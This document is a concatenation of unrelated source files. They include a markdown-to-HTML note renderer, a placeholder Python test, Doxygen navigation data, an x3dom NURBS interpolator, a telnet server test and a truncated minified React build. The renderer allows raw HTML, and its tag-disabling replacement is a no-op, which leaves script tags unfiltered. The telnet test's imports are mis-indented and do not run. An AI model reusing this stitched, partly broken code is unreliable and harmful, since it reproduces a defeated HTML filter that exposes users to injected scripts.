			temp.push('</style>');
			output = temp.concat(output);
		}

		return output.join('');
	}

	// Wraps each search keyword occurrence in the body with a highlight span.
	applyHighlightedKeywords_(body, keywords) {
		if (!keywords.length) return body;
		return StringUtils.surroundKeywords(keywords, body, '<span class="highlighted-keyword">', '</span>');
	}

	// Renders the markdown body to a full HTML string (inline <style> + body).
	// `style` supplies the theme colours/sizes; `options` supports
	// postMessageSyntax, paddingBottom, highlightedKeywords and
	// onResourceLoaded. Results are cached per content key.
	render(body, style, options = null) {
		if (!options) options = {};
		if (!options.postMessageSyntax) options.postMessageSyntax = 'postMessage';
		if (!options.paddingBottom) options.paddingBottom = '0';
		if (!options.highlightedKeywords) options.highlightedKeywords = [];

		// Return the cached output when nothing relevant changed.
		const cacheKey = this.makeContentKey(this.loadedResources_, body, style, options);
		if (this.cachedContentKey_ === cacheKey) return this.cachedContent_;

		const md = new MarkdownIt({
			breaks: true,
			linkify: true,
			html: true,
		});

		body = this.applyHighlightedKeywords_(body, options.highlightedKeywords);

		// Add `file:` protocol in linkify to allow text in the format of "file://..." to translate into
		// file-URL links in html view
		md.linkify.add('file:', {
			validate: function (text, pos, self) {
				var tail = text.slice(pos);
				if (!self.re.file) {
					// matches all local file URI on Win/Unix/MacOS systems including reserved characters in some OS (i.e. no OS specific sanity check)
					self.re.file = new RegExp('^[\\/]{2,3}[\\S]+');
				}
				if (self.re.file.test(tail)) {
					return tail.match(self.re.file)[0].length;
				}
				return 0;
			}
		});

		// enable file link URLs in MarkdownIt. Keeps other URL restrictions of MarkdownIt untouched.
		// Format [link name](file://...)
		md.validateLink = function (url) {
			var BAD_PROTO_RE = /^(vbscript|javascript|data):/;
			var GOOD_DATA_RE = /^data:image\/(gif|png|jpeg|webp);/;
			// url should be normalized at this point, and existing entities are decoded
			var str = url.trim().toLowerCase();
			return BAD_PROTO_RE.test(str) ? (GOOD_DATA_RE.test(str) ? true : false) : true;
		}

		// This is currently used only so that the $expression$ and $$\nexpression\n$$ blocks are translated
		// to math_inline and math_block blocks. These blocks are then processed directly with the Katex
		// library. It is better this way as then it is possible to conditionally load the CSS required by
		// Katex and use an up-to-date version of Katex (as of 2018, the plugin is still using 0.6, which is
		// buggy instead of 0.9).
		md.use(require('markdown-it-katex'));

		// Hack to make checkboxes clickable. Ideally, checkboxes should be parsed properly in
		// renderTokens_(), but for now this hack works. Marking it with HORRIBLE_HACK so
		// that it can be removed and replaced later on.
		const HORRIBLE_HACK = true;

		if (HORRIBLE_HACK) {
			// Replace each "- [ ]"/"- [x]" with a numbered placeholder that is
			// turned into a clickable <a class="checkbox"> after rendering.
			let counter = -1;
			while (body.indexOf('- [ ]') >= 0 || body.indexOf('- [X]') >= 0 || body.indexOf('- [x]') >= 0) {
				body = body.replace(/- \[(X| |x)\]/, function(v, p1) {
					let s = p1 == ' ' ? 'NOTICK' : 'TICK';
					counter++;
					return '- mJOPmCHECKBOXm' + s + 'm' + counter + 'm';
				});
			}
		}

		const env = {};

		const tokens = md.parse(body, env);

		let renderedBody = this.renderTokens_(md, tokens, options);

		// console.info(body);
		// console.info(tokens);
		// console.info(renderedBody);

		if (HORRIBLE_HACK) {
			// Convert the placeholders back into clickable checkbox anchors.
			// loopCount guards against a malformed placeholder causing an
			// infinite loop.
			let loopCount = 0;
			while (renderedBody.indexOf('mJOPm') >= 0) {
				renderedBody = renderedBody.replace(/mJOPmCHECKBOXm([A-Z]+)m(\d+)m/, function(v, type, index) {
					const js = options.postMessageSyntax + "('checkboxclick:" + type + ':' + index + "'); this.classList.contains('tick') ? this.classList.remove('tick') : this.classList.add('tick'); return false;";
					return '<a data-from-md href="#" onclick="' + js + '" class="checkbox ' + (type == 'NOTICK' ? '' : 'tick') + '"><span>' + '' + '</span></a>';
				});
				if (loopCount++ >= 9999) break;
			}
		}

		// Route raw <img> tags that point at resources through renderImageHtml_().
		renderedBody = renderedBody.replace(/<img(.*?)src=["'](.*?)["'](.*?)\/>/g, (v, before, src, after) => {
			if (!Resource.isResourceUrl(src)) return '<img ' + before + ' src="' + src + '" ' + after + '/>';
			return this.renderImageHtml_(before, src, after, options);
		});

		// To disable meta tags that would refresh the page - eg "<meta http-equiv="refresh" content="5; url=/">"
		// Also disable a few other tags that are likely not meant to be rendered.
		// https://github.com/laurent22/joplin/issues/769
		// NOTE(review): this replacement is a no-op as written ('<$1' replaces
		// '<$1'); the intended replacement is presumably '&lt;$1' and the
		// entity looks to have been decoded somewhere upstream - confirm
		// against the original source before changing.
		renderedBody = renderedBody.replace(/<(meta|title|body|html|script)/, '<$1');

		// https://necolas.github.io/normalize.css/
		const normalizeCss = `
			html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}
			article,aside,footer,header,nav,section{display:block}h1{font-size:2em;margin:.67em 0}hr{box-sizing:content-box;height:0;overflow:visible}
			pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent;-webkit-text-decoration-skip:objects}
			b,strong{font-weight:bolder}small{font-size:80%}img{border-style:none}
		`;

		const fontFamily = 'sans-serif';

		const css = `
			body {
				font-size: ` + style.htmlFontSize + `;
				color: ` + style.htmlColor + `;
				line-height: ` + style.htmlLineHeight + `;
				background-color: ` + style.htmlBackgroundColor + `;
				font-family: ` + fontFamily + `;
				padding-bottom: ` + options.paddingBottom + `;
				/* So that, for example, highlighted text or background images are printed too, otherwise browsers tend not to print these things */
				-webkit-print-color-adjust: exact;
			}
			p, h1, h2, h3, h4, h5, h6, ul, table {
				margin-top: 0;
				margin-bottom: 14px;
			}
			h1 {
				font-size: 1.5em;
				font-weight: bold;
			}
			h2 {
				font-size: 1.2em;
				font-weight: bold;
			}
			h3, h4, h5, h6 {
				font-size: 1em;
				font-weight: bold;
			}
			a {
				color: ` + style.htmlLinkColor + `
			}
			ul {
				padding-left: 1.3em;
			}
			li p {
				margin-bottom: 0;
			}
			.resource-icon {
				display: inline-block;
				position: relative;
				top: .5em;
				text-decoration: none;
				width: 1.15em;
				height: 1.5em;
				margin-right: 0.4em;
				background-color: ` + style.htmlColor + `;
				/* Awesome Font file */
				-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1892' xmlns='http://www.w3.org/2000/svg'><path d='M288 128C129 128 0 257 0 416v960c0 159 129 288 288 288h960c159 0 288-129 288-288V416c0-159-129-288-288-288H288zm449.168 236.572l263.434.565 263.431.562.584 73.412.584 73.412-42.732 1.504c-23.708.835-47.002 2.774-52.322 4.36-14.497 4.318-23.722 12.902-29.563 27.51l-5.12 12.802-1.403 291.717c-1.425 295.661-1.626 302.586-9.936 343.043-15.2 74-69.604 150.014-142.197 198.685-58.287 39.08-121.487 60.47-208.155 70.45-22.999 2.648-122.228 2.636-141.976-.024l-.002.006c-69.785-9.377-108.469-20.202-154.848-43.332-85.682-42.73-151.778-116.991-177.537-199.469-10.247-32.81-11.407-40.853-11.375-78.754.026-31.257.76-39.15 5.024-54.043 8.94-31.228 20.912-51.733 43.56-74.62 27.312-27.6 55.812-40.022 95.524-41.633 37.997-1.542 63.274 5.024 87.23 22.66 15.263 11.235 30.828 33.238 39.537 55.884 5.52 14.355 5.949 18.31 7.549 69.569 1.675 53.648 3.05 63.99 11.674 87.785 11.777 32.499 31.771 55.017 61.46 69.22 26.835 12.838 47.272 16.785 80.56 15.56 21.646-.798 30.212-2.135 43.208-6.741 38.682-13.708 70.96-44.553 86.471-82.635 16.027-39.348 15.995-38.647 15.947-361.595-.042-283.26-.09-286.272-4.568-296.153-10.958-24.171-22.488-28.492-81.074-30.377l-42.969-1.38v-147.95z'/></svg>");
			}
			a.checkbox {
				display: inline-block;
				position: relative;
				top: .5em;
				text-decoration: none;
				width: 1.65em; /* Need to cut a bit the right border otherwise the SVG will display a black line */
				height: 1.7em;
				margin-right: .3em;
				background-color: ` + style.htmlColor + `;
				/* Awesome Font square-o */
				-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1792 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1312 256h-832q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113v-832q0-66-47-113t-113-47zm288 160v832q0 119-84.5 203.5t-203.5 84.5h-832q-119 0-203.5-84.5t-84.5-203.5v-832q0-119 84.5-203.5t203.5-84.5h832q119 0 203.5 84.5t84.5 203.5z'/></svg>");
			}
			a.checkbox.tick {
				left: .1245em; /* square-o and check-square-o aren't exactly aligned so add this extra gap to align them */
				/* Awesome Font check-square-o */
				-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1792 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1472 930v318q0 119-84.5 203.5t-203.5 84.5h-832q-119 0-203.5-84.5t-84.5-203.5v-832q0-119 84.5-203.5t203.5-84.5h832q63 0 117 25 15 7 18 23 3 17-9 29l-49 49q-10 10-23 10-3 0-9-2-23-6-45-6h-832q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113v-254q0-13 9-22l64-64q10-10 23-10 6 0 12 3 20 8 20 29zm231-489l-814 814q-24 24-57 24t-57-24l-430-430q-24-24-24-57t24-57l110-110q24-24 57-24t57 24l263 263 647-647q24-24 57-24t57 24l110 110q24 24 24 57t-24 57z'/></svg>");
			}
			table {
				border-collapse: collapse;
			}
			td, th {
				border: 1px solid silver;
				padding: .5em 1em .5em 1em;
				font-size: ` + style.htmlFontSize + `;
				color: ` + style.htmlColor + `;
				background-color: ` + style.htmlBackgroundColor + `;
				font-family: ` + fontFamily + `;
			}
			hr {
				border: none;
				border-bottom: 1px solid ` + style.htmlDividerColor + `;
			}
			img {
				max-width: 100%;
				height: auto;
			}
			.inline-code {
				border: 1px solid ` + style.htmlCodeBorderColor + `;
				background-color: ` + style.htmlCodeColor + `;
				padding-right: .2em;
				padding-left: .2em;
			}
			.highlighted-keyword {
				background-color: #F3B717;
				color: black;
			}
			/*
			This is to fix https://github.com/laurent22/joplin/issues/764
			Without this, the tag attached to an equation float at an absoluate position of the page,
			instead of a position relative to the container.
			*/
			.katex-display>.katex>.katex-html {
				position: relative;
			}
			@media print {
				body {
					height: auto !important;
				}
				a.checkbox.tick {
					/* Checkbox ticks are displayed upside down when printed for some reason */
					transform: scaleY(-1);
				}
				pre {
					white-space: pre-wrap;
				}
				.code, .inline-code {
					border: 1px solid #CBCBCB;
				}
			}
		`;

		// To style the checkboxes in print when webkit-print-color-adjust is not enabled.
		// Keep it there for now in case that CSS parameter needs to be removed.
		// a.checkbox {
		// 	border: 1pt solid ` + style.htmlColor + `;
		// 	border-radius: 2pt;
		// 	width: 1em;
		// 	height: 1em;
		// 	line-height: 1em;
		// 	text-align: center;
		// 	top: .4em;
		// }
		// a.checkbox.tick:after {
		// 	content: "X";
		// }
		// a.checkbox.tick {
		// 	top: 0;
		// 	left: -0.02em;
		// 	color: ` + style.htmlColor + `;
		// }

		const styleHtml = '<style>' + normalizeCss + "\n" + css + '</style>';

		const output = styleHtml + renderedBody;

		this.cachedContent_ = output;
		this.cachedContentKey_ = cacheKey;
		return this.cachedContent_;
	}

	// Toggles the checked state of the index-th markdown checkbox ("- [ ]" /
	// "- [x]") in `body` and returns the updated body. Uses two passes of
	// placeholder substitution so already-processed checkboxes aren't rematched.
	toggleTickAt(body, index) {
		let counter = -1;
		while (body.indexOf('- [ ]') >= 0 || body.indexOf('- [X]') >= 0 || body.indexOf('- [x]') >= 0) {
			counter++;
			body = body.replace(/- \[(X| |x)\]/, function(v, p1) {
				let s = p1 == ' ' ? 'NOTICK' : 'TICK';
				if (index == counter) {
					// Flip the state of the targeted checkbox only.
					s = s == 'NOTICK' ? 'TICK' : 'NOTICK';
				}
				return '°°JOP°CHECKBOX°' + s + '°°';
			});
		}

		body = body.replace(/°°JOP°CHECKBOX°NOTICK°°/g, '- [ ]');
		body = body.replace(/°°JOP°CHECKBOX°TICK°°/g, '- [x]');

		return body;
	}

	// Handles a "checkboxclick:<TYPE>:<index>" message posted by the onclick
	// handler generated in render(), and returns the updated note body.
	handleCheckboxClick(msg, noteBody) {
		msg = msg.split(':');
		let index = Number(msg[msg.length - 1]);
		let currentState = msg[msg.length - 2]; // Not really needed but keep it anyway
		return this.toggleTickAt(noteBody, index);
	}
}
// Renderer is consumed as a CommonJS class export.
module.exports = MdToHtml;
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016, ParaTools, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# (1) Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# (2) Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# (3) Neither the name of ParaTools, Inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
"""Test functions.
Functions used for unit tests of cli_view.py.
"""
from taucmdr import tests
#from taucmdr.cli import cli_view
class CliViewTest(tests.TestCase):
    """Placeholder test case for ``cli_view``.

    NOTE(review): the real ``cli_view`` import is commented out above, so
    this currently only verifies that the test harness itself runs.
    """

    def test_cli_view(self):
        # Trivial smoke assertion; replace with real cli_view checks once
        # the module import is re-enabled.
        self.assertEqual(1, 1)
|
// Doxygen-generated navigation data for the `word` union: each entry is
// [member name, documentation anchor, third field (null here)].
// Do not edit by hand — regenerated by Doxygen.
var unionword =
[
    [ "w_float", "unionword.html#af36977dd3e9e1b3d319246b2795ca592", null ],
    [ "w_long", "unionword.html#aad3460d83d847510f7cdf66c4cfa5a49", null ],
    [ "w_obj", "unionword.html#a1c1b743bf0274774ab01ad52de7fae1b", null ],
    [ "w_sym", "unionword.html#a979bae342fac8dbb9af68f15080bedbc", null ]
];
/** @namespace x3dom.nodeTypes */
/*
* X3DOM JavaScript Library
* http://www.x3dom.org
*
* (C)2018 A. Plesch, Waltham, MA USA
* Dual licensed under the MIT and GPL
*/
/*
* Ayam, a free 3D modeler for the RenderMan interface.
*
* Ayam is copyrighted 1998-2016 by Randolf Schultz
* ([email protected]) and others.
*
* All rights reserved.
*
* See the file License for details.
*
*/
/* ### NurbsOrientationInterpolator ### */
x3dom.registerNodeType(
    "NurbsOrientationInterpolator",
    "NURBS",
    defineClass(x3dom.nodeTypes.X3DChildNode,

        /**
         * Constructor for NurbsOrientationInterpolator
         * @constructs x3dom.nodeTypes.NurbsOrientationInterpolator
         * @x3d 3.3
         * @component NURBS
         * @status experimental
         * @extends x3dom.nodeTypes.X3DChildNode
         * @param {Object} [ctx=null] - context object, containing initial settings like namespace
         * @classdesc NurbsOrientationInterpolator produces an orientation derived from the
         * tangent of a 3D NURBS curve at the requested fraction (see getValue below).
         */
        function (ctx) {
            x3dom.nodeTypes.NurbsOrientationInterpolator.superClass.call(this, ctx);

            /**
             * the order of the curve.
             * @var {x3dom.fields.SFInt32} order
             * @memberof x3dom.nodeTypes.NurbsOrientationInterpolator
             * @initvalue 3
             * @range [2, inf]
             * @field x3d
             * @instance
             */
            this.addField_SFInt32(ctx, 'order', 3);

            /**
             * knots defines the knot vector. The number of knots shall be equal to the number of control points
             * plus the order of the curve. The order shall be non-decreasing. Within the knot vector there may not be more
             * than order−1 consecutive knots of equal value. If the length of a knot vector is 0 or not the exact number
             * required (numcontrolPoint + order), a default uniform knot vector is computed.
             * @var {x3dom.fields.MFDouble} knot
             * @memberof x3dom.nodeTypes.NurbsOrientationInterpolator
             * @initvalue []
             * @range [-inf, inf]
             * @field x3d
             * @instance
             */
            this.addField_MFDouble(ctx, 'knot', []);

            /**
             * controlPoint defines the X3DCoordinateNode instance that provides the source of coordinates used to control
             * the curve or surface. Depending on the weight value and the order, this piecewise linear curve is approximated
             * by the resulting parametric curve. The number of control points shall be equal to or greater than the order.
             * @var {x3dom.fields.SFNode} controlPoint
             * @memberof x3dom.nodeTypes.NurbsOrientationInterpolator
             * @initvalue null
             * @field x3d
             * @instance
             */
            this.addField_SFNode('controlPoint', x3dom.nodeTypes.X3DCoordinateNode);

            /**
             * control point weights: P[i].w = weight[ i ]
             * @var {x3dom.fields.MFDouble} weight
             * @memberof x3dom.nodeTypes.NurbsOrientationInterpolator
             * @initvalue []
             * @range [0, inf]
             * @field x3d
             * @instance
             */
            this.addField_MFDouble(ctx, 'weight', []);

            /**
             * The set_fraction inputOnly field receives an SFFloat event and causes the interpolator node function
             * to evaluate, resulting in a value_changed output event of the specified type with the same timestamp as the set_fraction event.
             * @var {x3dom.fields.SFFloat} set_fraction
             * @memberof x3dom.nodeTypes.NurbsOrientationInterpolator
             * @initvalue 0
             * @field x3d
             * @instance
             */
            this.addField_SFFloat(ctx, 'set_fraction', 0);

            this.points = []; //MFVec3f controlPoints
            this._fractionalShift = 0.01; //relative distance to adjacent point
            this._downZ = new x3dom.fields.SFVec3f(0, 0, -1);
            //this.basisFunsCache = {}; //N[u]
            //this evaluates the curve at set_fraction
            //alternatively, tessellate at some degree dependant resolution and turn into linear positioninterpolator
        },
        {
            fieldChanged: function(fieldName) {
                // switch (fieldName) {
                // case 'knot':
                // case 'order': this.basisFunsCache = {};
                // }
                // Only set_fraction triggers evaluation; other field changes
                // take effect lazily on the next getValue call.
                if(fieldName === "set_fraction")
                {
                    var value = this.getValue(this._vf.set_fraction);
                    this.postMessage('value_changed', value);
                }
            },

            getValue: function (u) {
                this.points = this._cf.controlPoint.node._vf.point;
                var points = this.points.length;
                var knot = this._vf.knot;
                // Repair degenerate knot vectors (spec: #knots = #points + order).
                // NOTE(review): createDefaultKnots presumably rewrites this._vf.knot;
                // the local `knot` reference taken above may then be stale for the
                // uShift computation below — confirm against NurbsPositionInterpolator.
                if (knot.length !== points + this._vf.order)
                    x3dom.nodeTypes.NurbsPositionInterpolator.prototype.createDefaultKnots.call(this);
                if (this._vf.weight.length != points)
                    this._vf.weight = Array(points).fill(1.0);
                // Approximate the tangent by differencing two nearby curve points,
                // then rotate the reference -Z axis onto that direction.
                var uShift = (knot[knot.length-1] - knot[0]) * this._fractionalShift;
                var diff = this.curvePoint(u).subtract(this.curvePoint(u+uShift));
                return x3dom.fields.Quaternion.rotateFromTo(this._downZ, diff);
            },

            curvePoint: function (u) {
                // Delegate curve evaluation to NurbsPositionInterpolator.
                return x3dom.nodeTypes.NurbsPositionInterpolator.prototype.curvePoint.call(this, u);
            },

            findSpan: function (n, p, u, U) {
                return x3dom.nodeTypes.NurbsCurve.prototype.findSpan(n, p, u, U);
            }, /* findSpan */

            basisFuns: function (i, u, p, U) { // modified to disable cache
                return x3dom.nodeTypes.NurbsPositionInterpolator.prototype.basisFuns(i, u, p, U);
            } /* basisFuns */
        }
    )
);
|
"use strict";
// Compiled (TypeScript) module stub: marks the module as an ES module.
// It currently exports nothing.
Object.defineProperty(exports, "__esModule", { value: true });
//# sourceMappingURL=classifier.js.map
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_telnet
----------------------------------
Tests for `telnet` module.
"""
try:
import unittest2 as unittest
except ImportError:
import unittest
import telnetlib
from wikipediabase import telnet
# TODO: fix this test, it's hanging because the server is single-threaded
def answer(msg):
    """Echo handler for the test telnet server: quotes back the message."""
    reply = "You said '%s'" % msg
    return reply
class TestTelnet(unittest.TestCase):
    """Tests for the wikipediabase telnet server.

    NOTE(review): setUp binds a real TCP listener on port 1984 and opens a
    client connection to it; the actual request/response test is disabled
    (see module TODO: the server is single-threaded and would hang).
    """

    def setUp(self):
        # Server replies via answer(); client connects over the same host/port.
        self.srv = telnet.TelnetServer(('0.0.0.0', 1984), answer)
        self.cli = telnetlib.Telnet("0.0.0.0", 1984)

    # def test_answer(self):
    #     self.srv.serve_forever()
    #     self.cli.write("Awesome!!\n")
    #     self.assertIn("You said 'Awesome!!", self.cli.read_some())

    def tearDown(self):
        # Stop the serve loop and release the listening socket.
        self.srv.shutdown()
        self.srv.server_close()
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
/** @license React v16.13.1
* react.production.min.js
*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*/
'use strict';(function(d,r){"object"===typeof exports&&"undefined"!==typeof module?r(exports):"function"===typeof define&&define.amd?define(["exports"],r):(d=d||self,r(d.React={}))})(this,function(d){function r(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,c=1;c<arguments.length;c++)b+="&args[]="+encodeURIComponent(arguments[c]);return"Minified React error #"+a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}
function w(a,b,c){this.props=a;this.context=b;this.refs=ba;this.updater=c||ca}function da(){}function L(a,b,c){this.props=a;this.context=b;this.refs=ba;this.updater=c||ca}function ea(a,b,c){var g,e={},fa=null,d=null;if(null!=b)for(g in void 0!==b.ref&&(d=b.ref),void 0!==b.key&&(fa=""+b.key),b)ha.call(b,g)&&!ia.hasOwnProperty(g)&&(e[g]=b[g]);var h=arguments.length-2;if(1===h)e.children=c;else if(1<h){for(var k=Array(h),f=0;f<h;f++)k[f]=arguments[f+2];e.children=k}if(a&&a.defaultProps)for(g in h=a.defaultProps,
h)void 0===e[g]&&(e[g]=h[g]);return{$$typeof:x,type:a,key:fa,ref:d,props:e,_owner:M.current}}function va(a,b){return{$$typeof:x,type:a.type,key:b,ref:a.ref,props:a.props,_owner:a._owner}}function N(a){return"object"===typeof a&&null!==a&&a.$$typeof===x}function wa(a){var b={"=":"=0",":":"=2"};return"$"+(""+a).replace(/[=:]/g,function(a){return b[a]})}function ja(a,b,c,g){if(C.length){var e=C.pop();e.result=a;e.keyPrefix=b;e.func=c;e.context=g;e.count=0;return e}return{result:a,keyPrefix:b,func:c,
context:g,count:0}}function ka(a){a.result=null;a.keyPrefix=null;a.func=null;a.context=null;a.count=0;10>C.length&&C.push(a)}function O(a,b,c,g){var e=typeof a;if("undefined"===e||"boolean"===e)a=null;var d=!1;if(null===a)d=!0;else switch(e){case "string":case "number":d=!0;break;case "object":switch(a.$$typeof){case x:case xa:d=!0}}if(d)return c(g,a,""===b?"."+P(a,0):b),1;d=0;b=""===b?".":b+":";if(Array.isArray(a))for(var f=0;f<a.length;f++){e=a[f];var h=b+P(e,f);d+=O(e,h,c,g)}else if(null===a||
"object"!==typeof a?h=null:(h=la&&a[la]||a["@@iterator"],h="function"===typeof h?h:null),"function"===typeof h)for(a=h.call(a),f=0;!(e=a.next()).done;)e=e.value,h=b+P(e,f++),d+=O(e,h,c,g);else if("object"===e)throw c=""+a,Error(r(31,"[object Object]"===c?"object with keys {"+Object.keys(a).join(", ")+"}":c,""));return d}function Q(a,b,c){return null==a?0:O(a,"",b,c)}function P(a,b){return"object"===typeof a&&null!==a&&null!=a.key?wa(a.key):b.toString(36)}function ya(a,b,c){a.func.call(a.context,b,
a.count++)}function za(a,b,c){var g=a.result,e=a.keyPrefix;a=a.func.call(a.context,b,a.count++);Array.isArray(a)?R(a,g,c,function(a){return a}):null!=a&&(N(a)&&(a=va(a,e+(!a.key||b&&b.key===a.key?"":(""+a.key).replace(ma,"$&/")+"/")+c)),g.push(a))}function R(a,b,c,g,e){var d="";null!=c&&(d=(""+c).replace(ma,"$&/")+"/");b=ja(b,d,g,e);Q(a,za,b);ka(b)}function t(){var a=na.current;if(null===a)throw Error(r(321));return a}function S(a,b){var c=a.length;a.push(b);a:for(;;){var g=c-1>>>1,e=a[g];if(void 0!==
e&&0<D(e,b))a[g]=b,a[c]=e,c=g;else break a}}function n(a){a=a[0];return void 0===a?null:a}function E(a){var b=a[0];if(void 0!==b){var c=a.pop();if(c!==b){a[0]=c;a:for(var g=0,e=a.length;g<e;){var d=2*(g+1)-1,f=a[d],h=d+1,k=a[h];if(void 0!==f&&0>D(f,c))void 0!==k&&0>D(k,f)?(a[g]=k,a[h]=c,g=h):(a[g]=f,a[d]=c,g=d);else if(void 0!==k&&0>D(k,c))a[g]=k,a[h]=c,g=h;else break a}}return b}return null}function D(a,b){var c=a.sortIndex-b.sortIndex;return 0!==c?c:a.id-b.id}function F(a){for(var b=n(u);null!==
b;){if(null===b.callback)E(u);else if(b.startTime<=a)E(u),b.sortIndex=b.expirationTime,S(p,b);else break;b=n(u)}}function T(a){y=!1;F(a);if(!v)if(null!==n(p))v=!0,z(U);else{var b=n(u);null!==b&&G(T,b.startTime-a)}}function U(a,b){v=!1;y&&(y=!1,V());H=!0;var c=m;try{F(b);for(l=n(p);null!==l&&(!(l.expirationTime>b)||a&&!W());){var g=l.callback;if(null!==g){l.callback=null;m=l.priorityLevel;var e=g(l.expirationTime<=b);b=q();"function"===typeof e?l.callback=e:l===n(p)&&E(p);F(b)}else E(p);l=n(p)}if(null!==
l)var d=!0;else{var f=n(u);null!==f&&G(T,f.startTime-b);d=!1}return d}finally{l=null,m=c,H=!1}}function oa(a){switch(a){case 1:return-1;case 2:return 250;case 5:return 1073741823;case 4:return 1E4;default:return 5E3}}var f="function"===typeof Symbol&&Symbol.for,x=f?Symbol.for("react.element"):60103,xa=f?Symbol.for("react.portal"):60106,Aa=f?Symbol.for("react.fragment"):60107,Ba=f?Symbol.for("react.strict_mode"):60108,Ca=f?Symbol.for("react.profiler"):60114,Da=f?Symbol.for("react.provider"):60109,
Ea=f?Symbol.for("react.context"):60110,Fa=f?Symbol.for("react.forward_ref"):60112,Ga=f?Symbol.for("react.suspense"):60113,Ha=f?Symbol.for("react.memo"):60115,Ia=f?Symbol.for("react.lazy"):60116,la="function"===typeof Symbol&&Symbol.iterator,pa=Object.getOwnPropertySymbols,Ja=Object.prototype.hasOwnProperty,Ka=Object.prototype.propertyIsEnumerable,I=function(){try{if(!Object.assign)return!1;var a=new String("abc");a[5]="de";if("5"===Object.getOwnPropertyNames(a)[0])return!1;var b={};for(a=0;10>a;a++)b["_"+
String.fromCharCode(a)]=a;if("0123456789"!==Object.getOwnPropertyNames(b).map(function(a){return b[a]}).join(""))return!1;var c={};"abcdefghijklmnopqrst".split("").forEach(function(a){c[a]=a});return"abcdefghijklmnopqrst"!==Object.keys(Object.assign({},c)).join("")?!1:!0}catch(g){return!1}}()?Object.assign:function(a,b){if(null===a||void 0===a)throw new TypeError("Object.assign cannot be called with null or undefined");var c=Object(a);for(var g,e=1;e<arguments.length;e++){var d=Object(arguments[e]);
for(var f in d)Ja.call(d,f)&&(c[f]=d[f]);if(pa){g=pa(d);for(var h=0;h<g.length;h++)Ka.call(d,g[h])&&(c[g[h]]=d[g[h]])}}return c},ca={isMounted:function(a){return!1},enqueueForceUpdate:function(a,b,c){},enqueueReplaceState:function(a,b,c,d){},enqueueSetState:function(a,b,c,d){}},ba={};w.prototype.isReactComponent={};w.prototype.setState=function(a,b){if("object"!==typeof a&&"function"!==typeof a&&null!=a)throw Error(r(85));this.updater.enqueueSetState(this,a,b,"setState")};w.prototype.forceUpdate=
function(a){this.updater.enqueueForceUpdate(this,a,"forceUpdate")};da.prototype=w.prototype;f=L.prototype=new da;f.constructor=L;I(f,w.prototype);f.isPureReactComponent=!0;var M={current:null},ha=Object.prototype.hasOwnProperty,ia={key:!0,ref:!0,__self:!0,__source:!0},ma=/\/+/g,C=[],na={current:null},X;if("undefined"===typeof window||"function"!==typeof MessageChannel){var A=null,qa=null,ra=function(){if(null!==A)try{var a=q();A(!0,a);A=null}catch(b){throw setTimeout(ra,0),b;}},La=Date.now();var q=
function(){return Date.now()-La};var z=function(a){null!==A?setTimeout(z,0,a):(A=a,setTimeout(ra,0))};var G=function(a,b){qa=setTimeout(a,b)};var V=function(){clearTimeout(qa)};var W=function(){return!1};f=X=function(){}}else{var Y=window.performance,sa=window.Date,Ma=window.setTimeout,Na=window.clearTimeout;"undefined"!==typeof console&&(f=window.cancelAnimationFrame,"function"!==typeof window.requestAnimationFrame&&console.error("This browser doesn't support requestAnimationFrame. Make sure that you load a polyfill in older browsers. https://fb.me/react-polyfills"),
"function"!==typeof f&&console.error("This browser doesn't support cancelAnimationFrame. Make sure that you load a polyfill in older browsers. https://fb.me/react-polyfills"));if("object"===typeof Y&&"function"===typeof Y.now)q=function(){return Y.now()};else{var Oa=sa.now();q=function(){return sa.now()-Oa}}var J=!1,K=null,Z=-1,ta=5,ua=0;W=function(){return q()>=ua};f=function(){};X=function(a){0>a||125<a?console.error("forceFrameRate takes a positive int between 0 and 125, forcing framerates higher than 125 fps is not unsupported"):
